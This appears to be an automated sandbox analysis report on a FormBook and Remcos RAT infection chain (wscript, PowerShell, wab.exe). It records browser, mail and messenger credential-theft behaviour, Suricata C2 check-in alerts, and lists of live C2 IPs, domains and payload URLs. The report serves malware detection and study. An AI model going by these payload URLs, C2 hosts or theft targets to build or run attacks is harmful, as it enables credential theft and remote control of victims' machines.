Source: wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:02:00 Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager~J
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerjJ3)
Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:03:39 Program Manager]
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagertX@fn
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFJG)t$
Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221949132.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4244405887.0000000023F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager{J")
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagertK

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72933 cpuid

10_2_23D72933

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

10_2_23D72264

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

18_2_004082CD

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0041739B GetVersionExW,

17_2_0041739B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to steal Mail credentials (via file registry)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: ESMTPPassword	18_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	18_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	18_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.78.41.174	411divorce.com	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	true
104.21.62.202	avocaldoperu.com	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	www.katasoo.com	European Union	13335	CLOUDFLARENETUS	true
203.161.41.205	www.shabygreen.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
193.25.216.165	cpanel-adminhost.com	Germany	10753	LVLT-10753US	false
172.111.137.132	iwarsut775laudrye2.duckdns.org	United States	36351	SOFTLAYERUS	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
162.241.2.92	vendasnaweb1.com	United States	26337	OIS1US	true
3.33.130.190	ctorq.net	United States	8987	AMAZONEXPANSIONGB	true
142.250.186.147	ghs.googlehosted.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
avocaldoperu.com	104.21.62.202	true
ctorq.net	3.33.130.190	true
kera333.org	64.46.102.70	true
geoplugin.net	178.237.33.50	true
gtprivatewealth.com	3.33.130.190	true
cpanel-adminhost.com	193.25.216.165	true
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true
vendasnaweb1.com	162.241.2.92	true
www.shabygreen.top	203.161.41.205	true
atlpicsstudios.com	3.33.130.190	true
411divorce.com	5.78.41.174	true
ghs.googlehosted.com	142.250.186.147	true
www.katasoo.com	188.114.96.3	true
iwarsut775laudrye2.duckdns.org	172.111.137.132	true
www.openhandedvision.com	unknown	unknown
www.vendasnaweb1.com	unknown	unknown
www.411divorce.com	unknown	unknown
www.ctorq.net	unknown	unknown
www.atlpicsstudios.com	unknown	unknown
www.martinminorgroup.com	unknown	unknown
www.kera333.org	unknown	unknown
www.gtprivatewealth.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cpanel-adminhost.com/Stevns179.mix	false	Avira URL Cloud: safe	unknown
http://www.atlpicsstudios.com/pbzm/	true	Avira URL Cloud: safe	unknown
http://www.katasoo.com/7qad/	true	Avira URL Cloud: safe	unknown
https://avocaldoperu.com/Jouse4.png	false	Avira URL Cloud: safe	unknown
http://www.shabygreen.top/r9e8/	true	Avira URL Cloud: safe	unknown
http://www.martinminorgroup.com/oyqt/	true	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
http://www.411divorce.com/hxac/	true	Avira URL Cloud: safe	unknown
https://avocaldoperu.com/Jouse1.png	false	Avira URL Cloud: safe	unknown
http://cpanel-adminhost.com/wWdnBiepyw166.bin	false	Avira URL Cloud: safe	unknown
http://www.vendasnaweb1.com/jk4m/	true	Avira URL Cloud: safe	unknown
http://www.openhandedvision.com/ehr0/	false	Avira URL Cloud: safe	unknown
http://www.gtprivatewealth.com/4d31/	true	Avira URL Cloud: safe	unknown

AV Detection

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,

17_2_00404423

Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

Source:	Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe
Source:	Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_23D710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,	17_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	18_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49738 -> 172.111.137.132:57484
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.137.132:57484 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 162.241.2.92:80
